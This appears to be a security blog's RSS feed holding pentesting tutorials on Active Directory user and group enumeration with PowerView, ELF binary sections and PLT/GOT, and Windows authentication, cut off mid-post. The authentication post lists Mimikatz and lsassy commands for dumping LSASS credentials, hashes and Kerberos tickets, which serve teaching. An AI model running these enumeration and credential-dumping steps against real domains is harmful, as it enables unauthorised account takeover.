Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
LM: aad3b435b51404eeaad3b435b51404ee # Always the same value nowadays
&lt;details&gt;
&lt;summary&gt;NT: 31d6cfe0d16ae931b73c59d7e0c089c0&lt;/summary&gt;

```

-   **Kerberos Keys**:**Function**: These are derived from user passwords and are vital for authentication via the Kerberos protocol.**Encryption Algorithms**:**AES 256 Key**: The go-to for the AES256-CTS-HMAC-SHA1-96 algorithm, commonly used by Kerberos.**AES 128 Key**: Used with the AES128-CTS-HMAC-SHA1-96 algorithm.**DES Key**: Linked to the now-deprecated DES-CBC-MD5 algorithm.**RC4 Key**: Essentially the NT hash, employed by the RC4 HMAC algorithm.

## Retrieving and Decrypting Credentials

-   **Techniques from Previous Chapters**: To extract these credentials, we employ the methods discussed in earlier chapters of this series.
-   **Administrator Privileges**: A key point to remember is that recovering these passwords requires administrator-level access.

## UserAccountControl

Property of a user that should be taken into account, as it is important from a security point of view. Its flags are as follows:

-   **ACCOUNT\_DISABLE**: Account is disabled and cannot be used.
-   **DONT\_REQUIRE\_PREAUTH**: The account doesn&apos;t require Kerberos pre-authentication.
-   **NOT\_DELEGATED**: This account cannot be delegated through Kerberos delegation.
-   **TRUSTED\_FOR\_DELEGATION**: Kerberos Unconstrained Delegation is enabled for this account and its services.
-   **TRUSTED\_TO\_AUTH\_FOR\_DELEGATION**: The Kerberos S4USelf extension is enabled for this account and its services.

# **Zeroing in on Key Users for Effective Active Directory Penetration Testing**

When you&apos;re navigating the intricate maze of a real-world domain, the sheer number of users can be overwhelming. It&apos;s like looking for a needle in a haystack. To help you zero in on the most impactful targets, here are some essential pointers to identify the key players in any domain.

## Identifying the Power Players

-   **Spot the IT Gurus**: Keep a sharp eye for users associated with IT. These folks often have the coveted administrative privileges – your golden ticket to broader access and control within the system.
-   **Target the Domain Overlord**: The default domain administrator user is your ultimate target. Imagine having a master key to every door in the domain; that&apos;s what compromising this account feels like.
-   **Don&apos;t Overlook krbtgt**: The krbtgt user account is like the silent guardian of user authentication, wielding the powerful NT and Kerberos keys. Understanding its role is crucial, especially as we delve deeper into Active Directory services in upcoming chapters.

## Cutting Through the Clutter with PowerView

-   **Finding the Admins with Ease**: To get straight to the admins, let PowerView be your guide. The `Invoke-EnumerateLocalAdmin` command is your searchlight, illuminating those with administrative powers amidst the sea of users.

![](/content/images/2023/03/enumAdmins.png)

Existing administrators in the machine

# **Unveiling Computer Accounts in Active Directory**

In the dynamic world of Active Directory, not only users but also computers have their unique accounts. These accounts are pivotal, as they play a crucial role in verifying the credentials of domain users attempting to log in. Identifying these computer accounts is quite straightforward – they&apos;re the ones starting with a dollar sign followed by the computer&apos;s hostname.

### Exploring Computer Accounts

-   **Querying the NTDS**: Want to take a peek at the different computers in the domain? It&apos;s simple. By querying the domain database (NTDS), you can reveal the myriad of computer accounts that exist. Just use this command:

```powershell
&lt;/details&gt;

Get-ADObject -LDAPFilter &quot;objectClass=User&quot; -Properties SamAccountName | select SamAccountName

```

![](/content/images/2023/03/computerAccounts.png)

Sample of domain users where those ending with &quot;$&quot; refer to computers.

**PowerView to the Rescue**: For a more targeted approach, especially if you&apos;re a fan of PowerView, you can enumerate the computers in the domain with ease. The following command not only does the job but also returns the domain names, making your search even more efficient:

```bash
&lt;details&gt;
&lt;summary&gt;Get-NetComputer&lt;/summary&gt;

```

# **Mastering Groups in Active Directory Penetration Testing**

In the intricate ecosystem of Active Directory, &apos;Groups&apos; is a powerful feature by Microsoft that simplifies the management of user privileges. Whether it&apos;s granting or revoking access rights, groups allow administrators to perform these tasks efficiently, impacting multiple users simultaneously. Let&apos;s explore how we can leverage this feature for effective penetration testing.

### Harnessing the Power of Groups

-   **Discovering Domain Groups**: To get a list of all the groups in the domain, the command is straightforward:

```powershell
&lt;/details&gt;

Get-ADGroup -Filter * | select SamAccountName

```

![](/content/images/2023/03/Groups.png)

Existing groups in the domain

**Using PowerView for Group Enumeration**: PowerView offers an intuitive way to list the different groups in the domain:

```powershell
&lt;details&gt;
&lt;summary&gt;Get-NetGroup &lt;/summary&gt;

```

**Focusing on Privileged Groups**: To narrow down your search to groups with &apos;admin&apos; in their names, which are often privileged, use:

```powershell
&lt;/details&gt;

Get-NetGroup *admin*

```

**Identifying a User’s Groups**: To find out the groups a specific user belongs to:

```powershell
#Get-NetGroup -UserName &lt;user&gt;
*Evil-WinRM* PS C:\Users\vaan\Documents&gt; Get-NetGroup -UserName vaan -Properties samaccountname

samaccountname
--------------
Denied RODC Password Replication Group
Domain Users
&lt;details&gt;
&lt;summary&gt;Domain Admins&lt;/summary&gt;

```

**Listing Users in a Specific Group**: And to list all users within a particular group, such as &apos;Domain Admins&apos;:

```powershell
&lt;/details&gt;

Get-DomainGroupMember -Identity &quot;Domain Admins&quot; -Recurse

```

![](/content/images/2023/03/usersOfAGroup-1.png)

Sample of users belonging to the group &quot;Domain Admins&quot;

## Important Groups to Note

**Domain Admins, Local Administrators, and Administrators**: These groups are particularly significant. Members of the &apos;Domain Admins&apos; group, who are automatically part of the &apos;Administrators&apos; group, have broad privileges across the domain. Compromising any user in this group could mean a total domain takeover. Similarly, the &apos;Local Administrators&apos; group is key for gaining maximum privileges on a specific machine. This is due to Domain Admins being added to local machine administrator groups by default.

![](/content/images/2023/03/Pasted-image-20230307125119.png)

Users of groups belonging to the group of administrators of a computer

![](/content/images/2023/03/ImportantGroups.png)

Groups with high privileges

# **Conclusion: Navigating the Complex Web of Active Directory in Penetration Testing**

As we wrap up this chapter, we&apos;ve traversed the intricate landscape of Active Directory, a cornerstone in the realm of network security and penetration testing. From the nuances of user properties and secrets to the strategic management of groups, our journey has equipped us with key insights and tools to navigate and exploit these systems effectively.

We&apos;ve learned how to identify and analyze crucial user accounts, decrypting the secrets behind NT/LM hashes and Kerberos keys. We&apos;ve also explored the significance of computer accounts, revealing their integral role in network security. Our deep dive into groups - the backbone of privilege management in Active Directory - has highlighted the importance of targeting specific user groups for a more efficient penetration testing strategy.

Understanding these elements of Active Directory is vital for anyone in the field of cybersecurity. It empowers us not only to identify vulnerabilities and potential attack vectors but also to think strategically about network security as a whole. As we continue this series, we will build upon this foundation, uncovering more advanced techniques and insights to enhance our skills in penetration testing and cybersecurity.

In the ever-evolving landscape of digital security, knowledge is power. And the insights gained in this chapter are invaluable tools in the arsenal of any cybersecurity professional, offering a guiding light through the complex, often daunting world of Active Directory penetration testing.

# Resources

[Active Directory Enumeration: PowerView - Hacking Articles](https://www.hackingarticles.in/active-directory-enumeration-powerview/)

[https://thehackerway.com/2021/12/15/evil-winrm-shell-sobre-winrm-para-pentesting-en-sistemas-windows-parte-2-de-2/](https://thehackerway.com/2021/12/15/evil-winrm-shell-sobre-winrm-para-pentesting-en-sistemas-windows-parte-2-de-2/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploring ELF Binary Dynamics: Relocations and Sections in Depth</title><link>https://www.kayssel.com/post/binary-4</link><guid isPermaLink="true">https://www.kayssel.com/post/binary-4</guid><description>Explore ELF binaries in Linux: Understand disassembly, sections like .text, .init, and dynamic linking with PLT, GOT. Uncover memory management, variables in .bss, .data, .rodata, and delve into lazy binding for efficient, secure code execution</description><pubDate>Sat, 18 Mar 2023 15:57:26 GMT</pubDate><content:encoded># **Introduction: My Journey Through ELF Binaries in the Linux Binary Exploitation Series**

Welcome to another chapter in my ongoing series on Linux binary exploitation, where I delve into the intricate world of Executable and Linkable Format (ELF) binaries. As I continue to explore the various aspects of binary exploitation on Linux, this installment is particularly special to me. It&apos;s here that I unravel the complexities and nuances of ELF binaries, a cornerstone of Linux and Unix systems.

In my journey through the realms of software development and cybersecurity, I&apos;ve encountered ELF binaries as more than just files; they are the essential gears that drive software’s interaction with the Linux operating system. This chapter builds on what I&apos;ve covered in previous parts of the series, taking a deep dive into the heart of ELF binaries. From the basic principles of disassembly and decompilation to the advanced realms of dynamic linking and vulnerability analysis, my aim is to demystify each element, offering a clear and comprehensive understanding.

Through this chapter, I will guide you through the anatomy of ELF binaries, exploring their sections, segments, memory management, and how they seamlessly integrate with dynamic libraries. Whether you are a seasoned programmer, an aspiring cybersecurity expert, or a newcomer to this field, my insights are crafted to enhance your understanding of how Linux programs operate and how to secure them effectively.

Join me as I continue this fascinating journey, connecting the knowledge from previous articles to provide a richer, more integrated understanding of Linux binary exploitation. This exploration is not just an academic exercise; it&apos;s a practical guide filled with the knowledge essential for navigating the modern landscape of computing. Let&apos;s dive in and uncover the secrets of ELF binaries together, as I share my learnings and discoveries in this captivating chapter of the Linux Binary Exploitation series.

# **Unveiling the Secrets of Binaries: Disassembly and Decompilation**

As we navigate through the realm of ELF binaries, it&apos;s essential to familiarize ourselves with the concepts of disassembly and the captivating world of decompilation. While we won&apos;t delve too deeply into the technicalities of disassembly just yet, let&apos;s explore its essence.

Picture disassembly as a kind of magic that transforms cryptic machine code—those baffling strings of 1s and 0s—into a more understandable form of assembly language. It&apos;s akin to peeling back the layers of a binary file, offering a glimpse into its core, almost like peering into the soul of the binary. This understanding is crucial, especially when tackling exploits and vulnerabilities.

Now, you might wonder, &quot;Is it possible to reverse-engineer machine code back into high-level languages like C or C++?&quot; It&apos;s an intriguing thought, but the reality is a bit more complex. The original code morphs significantly during compilation as it&apos;s optimized for performance and efficiency. Therefore, a perfect reverse-engineering to its original state is often unfeasible.

However, there&apos;s a ray of hope: decompilers. These are the unsung heroes of reverse engineering, capable of translating machine code into pseudocode that bears a strong resemblance to C/C++. While we&apos;re not diving into the deep end with these tools just yet, it&apos;s important to know they&apos;re part of our arsenal. So, get ready for an exciting exploration into the world of ELF binaries!

![](/content/images/2023/03/disvsdecom.png)

Disassembly and decompilation sample

# **Object File vs. Executable File: Unveiling Their Distinctions**

In this section, we embark on an enlightening journey to discern the critical differences between an ELF binary&apos;s object file, created post-compilation, and the executable file, born from the linking phase. This exploration is key to understanding the complexities of function and variable relocation during linking.

## Object Files: A Closer Look

We begin by exploring object files, utilizing the capabilities of radare2. Starting with the command `r2 test.o`, we enter the radare2 environment. Here, we execute a detailed analysis using the `aaa` command, effectively identifying functions and key elements in the file.

```bash
[0x08000040]&gt; aaa
				...
[0x08000040]&gt; afl
0x08000040    1     32 sym.main
[0x08000040]&gt; 

```

This initial analysis reveals that only the `main` function is identifiable at this stage. Other functions, like `printf`, remain undetected due to the absence of linking phase resolutions.

To delve into the `main` function&apos;s code, we employ the `pdf` command. Notably, radare2 indicates that the string &quot;Hello, world!&quot; resides in the `.rodata` section, highlighting its need for relocation—a direct consequence of the yet-to-be-performed linking phase. The `iz` command can extract strings from the object or executable:

```bash
[0x08000040]&gt; iz
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000060 0x08000060 13  14   .rodata ascii Hello, world!

```

![](/content/images/2023/03/objfile.png)

Disassembly of object code

In our analysis, we also observe the `puts` function being called—an imported function identified within the file. To confirm this, the `is` command lists the symbols in the file, showing `puts` as `imp.puts` (import puts):

```bash
[0x08000040]&gt; is
[Symbols]

nth paddr      vaddr      bind   type   size lib name
―――――――――――――――――――――――――――――――――――――――――――――――――――――
1   0x00000000 0x08000000 LOCAL  FILE   0        test.c
2   0x00000040 0x08000040 LOCAL  SECT   0        .text
3   0x00000060 0x08000060 LOCAL  SECT   0        .rodata
4   0x00000040 0x08000040 GLOBAL FUNC   32       main
5   0x00000000 0x08000000 GLOBAL NOTYPE 16       imp.puts

```

## **Executable Files: A Detailed Analysis Post-Linking**

Having explored object files, we now shift our focus to executable files, particularly those generated after the linking phase. This step provides us with a more complete and intricate understanding of the ELF binary.

### Insights into the Executable File

Upon examining an executable, we immediately notice a significant increase in the number of recognized functions compared to the object file. Among these, three functions are of particular interest: `main`, `sym.imp.puts`, and `entry0`. Let&apos;s start with `main`.

Running the command `afl` in radare2, we see a list of functions including `main`

```bash
[0x00401040]&gt; afl
0x00401040    1     37 entry0
0x00401080    4     31 sym.deregister_tm_clones
0x004010b0    4     49 sym.register_tm_clones
0x004010f0    3     32 sym.__do_global_dtors_aux
0x00401120    1      6 sym.frame_dummy
0x00401148    1     13 sym._fini
0x00401070    1      5 loc..annobin_static_reloc.c
0x00401126    1     32 main
0x00401030    1      6 sym.imp.puts
0x00401000    3     27 sym._init

```

In this stage, the analysis reveals more information:

1.  **Relocation of Strings**: The need for string relocation, as seen in object files, no longer exists. Radare2 can now directly locate the memory address of the string &quot;Hello, world!&quot; at `0x402010`.

```bash
[0x00401126]&gt; iz
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00002010 0x00402010 13  14   .rodata ascii Hello, world!

```

![](/content/images/2023/03/executablefile.png)

-   **Function Definitions**: The executable file no longer shows the definition of the function `puts` as `sym.imp`. This indicates that `puts` is a symbolic reference (`sym`) to an imported function (`imp`). Furthermore, we get a brief definition of the function, such as `int puts(const char *s)`, which aids in analysis.
-   **The `entry0` Function**: Commonly known as `__start` in other tools, `entry0` is a standard function in ELF binaries compiled with gcc. Its primary role is to set up command line arguments and the environment for executing the `main` function. The assembly code for `entry0` typically shows it calling `libc_start_main`, which then calls `main` with the appropriate arguments.

![](/content/images/2023/03/entry0.png)

entry0 code

# **Sections of a Binary: Foundations for Analyzing ELF Binaries**

Before delving into various exploiting techniques, it&apos;s crucial to understand the last piece of foundational theory relevant to ELF binaries analysis: the sections of a binary. Although more theoretical aspects will be introduced in future articles, the understanding of binary sections is essential for a comprehensive grasp of ELF files and their exploitation.

## Understanding Binary Sections

-   **What Are Sections?**: Sections in a binary are essentially logical divisions of the code and data. They don&apos;t adhere to a specific structure; rather, their structure is determined by their content.
-   **Section Headers**: Each section is described by what is known as a section header. These headers collectively form the section header table. Although we won&apos;t delve deeply into each header part, it&apos;s important to note that their definitions can be found in `/usr/include/elf.h`.

![](/content/images/2023/03/elfheader.png)

Structure of an executable of type ELF

## Role of Sections in a Binary

-   **Linker Assistance**: Sections are primarily designed to aid the linker. This means not all sections are essential for executing the binary in memory. For instance, some symbols or relocations are more geared towards debugging rather than being necessary for runtime.
-   **Segments and Execution**: When a binary is executed, its code and data are organized differently, known as segments. While we won&apos;t cover this concept in detail here, it&apos;s an important aspect to keep in mind.

## Exploring Sections in ELF Files on GNU/Linux

-   **Using radare2 for Section Analysis**: To examine the sections of ELF files, tools like radare2 can be very useful. Commands such as `rabin2 -S test` or `iS` within radare2 can provide detailed information about these sections.
-   **Permissions in Sections**: When analyzing sections, you&apos;ll encounter various permissions:
    -   **Read (`r`)**: Allows reading the contents of the section.
    -   **Write (`w`)**: Indicates whether writing in the section is permissible.
    -   **Execute (`x`)**: Determines if the section&apos;s code can be executed.

![](/content/images/2023/03/sections.png)

Sections of the test executable

## **Diving into the `.init`, `.fini`, and `.text` Sections of ELF Binaries**

Venturing into the world of ELF binaries, it&apos;s essential to understand the unique roles and characteristics of specific sections like `.init`, `.fini`, and `.text`. These sections are more than just parts of a binary; they are the keystones in understanding how a program functions from start to finish.

### The `.init` and `.fini` Sections: The Bookends of Program Execution

-   **The Role of `.init`**: Think of the `.init` section as the warm-up act before the main performance. This section executes right before the binary&apos;s main code, akin to an object constructor in object-oriented programming. The presence of the `-x` flag here tells us that this part of the code is set to execute.
-   **Understanding `.fini`**: On the flip side, the `.fini` section is like the final bow after a show. It runs after the main program, wrapping things up in a manner similar to an object&apos;s destructor. It&apos;s where the program does its final clean-ups.

### The `.text` Section: Where the Main Action Happens

-   **A Focus on Main Code**: The `.text` section is where the heart of the program beats. It&apos;s the main stage where all the primary actions and operations of the program are performed.
-   **Security in Permissions**: Noticeably, this section is typically marked with `r` (read) and `x` (execute) permissions, but pointedly lacks the `w` (write) permission. This isn&apos;t an oversight; it&apos;s a security measure. Allowing both execute and write permissions would be like leaving the door wide open for attackers.
-   **Analyzing the `.text` Section**: To get under the hood of the `.text` section, we use radare2&apos;s `iS` command to pinpoint its memory address. Then, with the `pD` command, we delve into its content, disassembling it to reveal the intricacies of the program&apos;s code:

```bash
iS
pD &lt;memory address to be dumped&gt; 

```

![](/content/images/2023/03/text.png)

.text section

## **The `.bss`, `.data`, and `.rodata` Sections in ELF Binaries**

When dissecting the structure of ELF binaries, three crucial sections emerge for organizing different types of variables: `.bss`, `.data`, and `.rodata`. Each of these sections plays a distinct role in how variables are stored and managed within an executable.

### Understanding the Different Sections

-   **The `.bss` Section**: This is where all the uninitialized variables reside. If you have variables that are declared but not assigned a value, they find their home here. It’s like a blank canvas waiting for data to be painted on it during runtime.
-   **The `.data` Section**: In contrast, the `.data` section houses initialized variables. These are the variables that are not only declared but also assigned a value. It&apos;s akin to a pre-filled canvas, where certain elements are already defined and set.
-   **The `.rodata` Section**: Standing for &quot;Read-Only Data&quot;, the `.rodata` section is reserved for constant variables. These are the variables that are set once and don&apos;t change throughout the execution. They are the immutable truths of the program.

### Permissions and Security Implications

-   **Write Permissions in `.data` and `.bss`**: Both the `.data` and `.bss` sections are given write permissions, aligning with their roles in storing variables that might change or be initialized during the program&apos;s execution.
-   **Read-Only Nature of `.rodata`**: In contrast, the `.rodata` section is read-only. This makes sense as it contains constants - values that should remain unchanged and protected from modification.

### Practical Example: &quot;Hello World!&quot;

In the context of our ongoing ELF binary analysis, the string &quot;Hello World!&quot; is a constant. Therefore, we find it in the `.rodata` section. It&apos;s a classic example of how constant data, like strings displayed to the user, are stored in a protected, read-only section to ensure they remain unaltered throughout the program&apos;s operation.

![](/content/images/2023/03/rodata.png)

.rodata section

# **Navigating the World of Lazy Binding, PLT, and GOT in ELF Binaries**

Welcome to the intriguing world of ELF binaries, where the integration of dynamic libraries during a program&apos;s run time is a ballet of efficiency and optimization. Here, we&apos;re going to unravel the mysteries of lazy binding, the Procedure Linkage Table (PLT), and the Global Offset Table (GOT) - three protagonists in this fascinating process.

## Lazy Binding: An Overview

-   **Dynamic Linking with Lazy Binding**: Although dynamic library relocations happen when an executable is loaded into memory, they are not fully resolved immediately. Instead, the relocations occur &quot;lazily&quot; - only when a function call is made or a variable from a dynamic library is used. This approach, known as lazy binding, optimizes performance by avoiding unnecessary relocations and is the default method used by dynamic linkers today.
-   **Utilizing PLT and GOT**: Lazy binding is facilitated by two main sections - the Procedure Linkage Table (.plt) and the Global Offset Table (.got).

## Understanding PLT and GOT

-   **Procedure Linkage Table (PLT)**: This section contains entries for each function that requires dynamic linking. An entry in the PLT typically includes:
    1.  A jump to the corresponding entry in the GOT.
    2.  The function&apos;s identifier placed on the stack.
    3.  A jump to the dynamic linker&apos;s default stub.
-   **Analyzing PLT**: To view the .plt section, commands like `iS` to show sections and `pD &lt;address&gt;` to display content can be used, similar to analyzing the .text section.
-   **Global Offset Table (GOT)**: The GOT holds memory addresses where dynamically linked functions will be placed. Initially, these addresses point back to the PLT, due to the lazy binding process not being complete.

![](/content/images/2023/03/plt.png)

.plt section

![](/content/images/2023/03/got.png)

Jump address in .got.plt

### The Lazy Binding Ballet

![](/content/images/2023/03/putsplt.png)

Dynamic linking process

1.  **The Function Call**: Let&apos;s say our program calls `puts`. This triggers the sequence in the PLT.
2.  **PLT-GOT Tango**: The PLT then gracefully jumps to the GOT entry, which for now, loops back to the PLT, ensuring the function identifier is noted.
3.  **The Dynamic Linker&apos;s Cue**: Next, we leap to the default stub, a preparatory step before the main performance by the dynamic linker.
4.  **The Final Performance**: The dynamic linker takes center stage, modifying the GOT to directly point to `puts`, streamlining all future calls.

### GOT vs. GOT.plt: The Two Arenas

-   **GOT.plt for Functions**: The .got.plt is where the magic happens for function references. It&apos;s dedicated to making sure function calls from shared libraries hit their mark.
-   **GOT for Variables**: The .got, on the other hand, is like a storage unit for variables or constants from shared libraries, bypassing the more complex dance steps needed for functions.

# **Conclusion: Navigating the Depths of ELF Binaries**

As we conclude our exploration of ELF binaries, we find ourselves having journeyed through a landscape rich in complexity and sophistication. From dissecting the very essence of disassembly and decompilation to demystifying the intricacies of sections like `.text`, `.init`, `.fini`, and others, we&apos;ve unraveled the fundamental components that constitute these binaries. We&apos;ve seen how they are meticulously structured, how they cleverly manage memory, and how dynamic libraries intertwine seamlessly with the program&apos;s execution through mechanisms like lazy binding, PLT, and GOT.

This excursion into the world of ELF binaries isn&apos;t just an academic exercise; it&apos;s a deep dive into the underpinnings of how software operates at its core. By understanding these elements, we&apos;re not just reading code; we&apos;re interpreting the language of the machine. We gain insights into the subtleties of how programs are executed, how they interact with the operating system, and how vulnerabilities can emerge and be exploited.

The knowledge of ELF binaries is invaluable for developers, security researchers, and anyone fascinated by the inner workings of software. It empowers us to write more efficient and secure code, to analyze and understand existing software at a granular level, and to think creatively about problem-solving in the realm of computing.

In essence, the journey through ELF binaries is a journey through the heart of computing, offering a foundational understanding that is both powerful and indispensable in the rapidly evolving landscape of technology. As we continue to build and secure the digital world, the insights gained here will undoubtedly serve as a guiding light, illuminating the path forward in the ever-expanding domain of software development and cybersecurity.</content:encoded><author>Ruben Santos</author></item><item><title>Windows Authentication Deep Dive: Unveiling Protocols, Credential Storage, and Extraction Techniques</title><link>https://www.kayssel.com/post/active-directory-4-secrets-in-windows-systems</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-4-secrets-in-windows-systems</guid><description>This chapter explores Windows authentication, SSO, and credential extraction. It covers protocols like Kerberos, NTLM, and Mimikatz for retrieving credentials. LSA and SAM play vital roles, and PowerShell history can reveal digital footprints. LaZagne is a tool for credential recovery.</description><pubDate>Fri, 03 Mar 2023 11:15:20 GMT</pubDate><content:encoded># **Introduction**

In this next chapter of our exploration into Active Directory security, we turn our focus to a cornerstone of safeguarding Windows systems: the authentication process. Here, in the complex web of digital security, we&apos;ll navigate the intricate protocols that stand as guardians at the gates of access and control.

Our journey will lead us through the diverse pathways of authentication methods, each a vital piece in the puzzle of network security. We&apos;ll delve into the secrets of how these protocols operate, and more intriguingly, where the keys to the kingdom - user credentials and secrets - are stored and protected.

As we continue to unravel the mysteries of Active Directory security, this chapter promises to illuminate the inner workings of Windows authentication, offering insights and knowledge crucial for understanding the sophisticated world of digital defense and access control.

# **Windows Logon: The Gateway to Digital Access**

In the world of Windows, stepping into your digital workspace is like passing through a high-security checkpoint. This is where Windows Logon comes into play, a critical process ensuring that only the right people get the keys to the kingdom. Whether it&apos;s accessing local files or diving into network resources, Windows demands that everyone shows their digital ID.

Let&apos;s break down this process. Imagine the Windows logon as a vigilant gatekeeper. The most familiar face of this gatekeeper is the &quot;Windows login&quot; screen, where you punch in your credentials – these could be your domain or local credentials, akin to showing your ID card at the entrance.

Then, there&apos;s the network login. Think of this as the second layer of security, happening behind the scenes after you&apos;ve already passed the first checkpoint. It&apos;s like a backstage pass, ensuring you have the right privileges to access specific network resources, like that coveted shared folder in Active Directory. Windows, being the versatile guard that it is, employs various authentication mechanisms for this, such as Kerberos and NTLM.

But wait, there&apos;s more! Windows logon isn&apos;t just about typing in passwords. In the high-tech world of today, it embraces other methods like smart cards or biometrics – it&apos;s like using a fingerprint or a special passcard to prove you&apos;re the real deal.

In essence, Windows logon is your personal bouncer, making sure that your digital space is accessed only by those who are authorized, keeping your digital assets safe and sound.

# **Authentication: The Art of Digital Identity Verification**

In the intricate ballet of digital security, Windows doesn&apos;t just dance; it orchestrates a complex routine of authentication and authorization. It&apos;s like a vigilant gatekeeper, constantly ensuring that every user is who they claim to be and has the right access pass to the digital resources they seek. But have you ever wondered why Windows doesn&apos;t pester us for credentials every single time? The answer lies in a nifty feature known as &quot;Single Sign-On&quot; (SSO).

SSO is like a VIP pass in the digital world. Once you&apos;re in, you can freely roam without being stopped at every door. This seamless experience, however, opens up avenues for various cybersecurity exploits, which we&apos;ll delve into more deeply later in this series. usually followed when you want to access a resource is as follows:

![](/content/images/2023/02/winlogon-1-.png)

High level authentication on Windows systems

Now, let&apos;s zoom in on the typical authentication scheme in Windows. Imagine a high-tech concierge, known as the Security Support Provider Interface (SSPI). This API is like a master of ceremonies in the authentication ballroom, pairing up requests with the appropriate security dance partners without needing to specify the dance style upfront. It&apos;s all about finding the right rhythm between the request and the security protocol.

Since the days of Windows Server 2003, Kerberos has been the leading dance style in this ballroom. But SSPI is flexible; it can sway to the rhythm of either Kerberos or NTLM, depending on the negotiation. These Security Support Providers (SSPs), each with their unique steps, are distributed across Windows machines in DLL format.

## **The Authentication Process: Choosing the Right Dance**

When it comes to accessing network resources, think of the authentication process like a high-stakes dance-off. There are two main strategies for choosing the right dance, or in technical terms, the right authentication protocol.

**1\. Specifying a Single Authentication Protocol:**

This is like a straightforward dance invitation. The client, eager to access a network resource, sends a request. The server then replies with the protocol - the specific dance style it prefers. If the client knows this dance (supports the protocol), they join in, and the authentication process continues smoothly. If not, it&apos;s like stepping on each other&apos;s toes, and the dance - or in this case, the process - comes to an abrupt end.

**2\. Negotiating the Authentication Protocol:**

Now, this is where things get a bit more sophisticated. It&apos;s like choosing a dance style that both partners are comfortable with. This negotiation is orchestrated by the Simple and Protected Negotiation Mechanism (SPNEGO) protocol, included in the SSP Negotiate.

![](/content/images/2023/03/protocolsuc.png)

Authentication process forcing protocol use

Picture the server sending out a list of dances it knows (supported protocols), along with a challenge for its favorite one. For instance, it might send NTLM and Kerberos, with a nudge towards Kerberos. The client then has three moves:

-   If it knows and likes the preferred dance (supports the protocol), the authentication tango continues.
-   If the preferred dance isn&apos;t their style but another one from the list is, they suggest it, and the process goes on.
-   If the client doesn’t know any of the dances (supports none of the protocols), it&apos;s a no-go, and the authentication process stumbles and falls.

Navigating this dance of protocols is essential for smooth access to network resources, ensuring that both parties are in sync and the right levels of security are maintained.

![](/content/images/2023/03/listanegociar.png)

Authentication process suggesting lists of protocols

## **Single Sign-On (SSO): The Convenience and Challenge**

Imagine walking into a high-security building and having to flash your ID badge at every door. Pretty cumbersome, right? Windows, understanding this hassle, offers a sleek solution known as Single Sign-On (SSO). SSO is like having a VIP pass that gets you through all the doors with just one show of your badge.

How does Windows pull off this trick? It tucks your credentials into a digital vault called the Local Security Authority (LSA). Like a skilled magician hiding a rabbit in a hat, Windows stores your login details in memory, allowing you seamless access to various network resources without the constant nagging for passwords.

But here&apos;s the twist in the tale: this very feature, while convenient, opens a Pandora&apos;s box of vulnerabilities. Tools like Mimikatz, which are akin to digital lockpicks, exploit this to extract hashes and plain text credentials from the LSA. It&apos;s a reminder that in the world of cybersecurity, convenience often walks hand-in-hand with caution.

As we navigate through the realm of Windows security, SSO stands out as a double-edged sword - a symbol of both seamless user experience and a potential security challenge.

## **Local Security Authority (LSA): The Guardian of Windows Security**

Welcome to the world of the Local Security Authority (LSA), a crucial subsystem in Windows that acts like a vigilant guardian of user authentication. The LSA isn&apos;t just a gatekeeper; it&apos;s more like a multitasking security chief, overseeing a range of critical tasks to keep your digital fortress secure.

**LSA&apos;s Key Roles:**

-   **Policymaker**: LSA manages the security policies of the system. Imagine it setting the rules of the game, like password policies and user permissions - it&apos;s the architect of the digital security blueprint.
-   **Token Generator**: Every time you need access, LSA creates an access token, a special pass that says, &quot;Yes, this person is who they claim to be.&quot;
-   **Authentication Provider**: It&apos;s the one-stop-shop for all things authentication, ensuring every login attempt is legit.
-   **Audit Policy Administrator**: LSA also keeps an eye on compliance, making sure audit policies are up to the mark.

**LSA&apos;s Authentication Strategies:**

-   **Local Verification**: If you&apos;re logging into the local machine, LSA checks your credentials against the Security Accounts Manager (SAM) database - think of it as checking your ID at a local club.
-   **Domain Verification**: For domain access, LSA consults the Domain Controller, using the NTDS to verify your credentials, akin to an international visa verification process.

## **Local Security Authority Subsystem Service (LSASS)**

Now, meet LSASS, a process that&apos;s like LSA&apos;s right-hand man, handling a variety of security tasks, from applying policies to changing passwords. But its standout role? User authentication. LSASS steps into the spotlight during Windows logon, caching a user&apos;s credentials for SSO. This means every time you need network access, LSASS has your credentials ready to go.

In LSASS&apos;s cache, you&apos;ll find an assortment of credentials:

-   **Kerberos Tickets**: Your all-access passes in the realm of Windows.
-   **NT and LM Hashes**: Encrypted keys to your digital identity.
-   **Plain Text Credentials**: The raw, unencrypted keys - handle with utmost care!

In essence, LSA and LSASS work together like a well-oiled machine, keeping the Windows security ecosystem robust, responsive, and reliable.

# Secrets

## **Unveiling Secrets: The Craft of LSASS Credential Extraction**

In the intricate world of Windows security, extracting credentials from the Local Security Authority Subsystem Service (LSASS) is like a covert mission for digital secrets. Enter Mimikatz, the master key in this quest, renowned for its ability to unlock the vaults of LSASS.

### **Getting the Right Privileges**

To start this mission, one must hold the &apos;SeDebugPrivilege&apos; privilege, typically reserved for the system&apos;s administrators. Imagine this as an exclusive pass to the backstage of Windows security. In the world of PowerShell, this privilege is ready and waiting, but in the Command Prompt (CMD), it&apos;s a different story. Here&apos;s where Mimikatz steps in with its command `privilege::debug`, flipping the switch to grant access.

### **Commands for Credential Extraction**

-   **Sekurlsa::logonpasswords**: This is your go-to for extracting NT hashes and passwords. It&apos;s like finding the secret codes to every locked door.
-   **Sekurlsa::ekeys**: Need Kerberos keys? This command is your digital locksmith.
-   **Sekurlsa::tickets**: For retrieving Kerberos tickets stored on the machine, think of it as collecting VIP passes to the digital kingdom.

![](/content/images/2023/03/Pasted-image-20230215152927.png)

LSSAS dump with mimikatz

### **Remote Credential Extraction**

But what if the mission calls for a remote operation? That&apos;s where lsassy enters the scene. This tool, with its versatility, allows for different approaches to extract credentials, making it possible to choose methods that attract less attention – a critical factor in covert operations.

![](/content/images/2023/03/Pasted-image-20230214083039.png)

LSSAS credentials dump with lssasy

Mimikatz and lsassy don’t just reveal passwords and keys; they uncover the hidden layers of security, reminding us of the ongoing cat-and-mouse game in digital security landscapes.

## **Registry Credentials: The Hidden Keys in Windows**

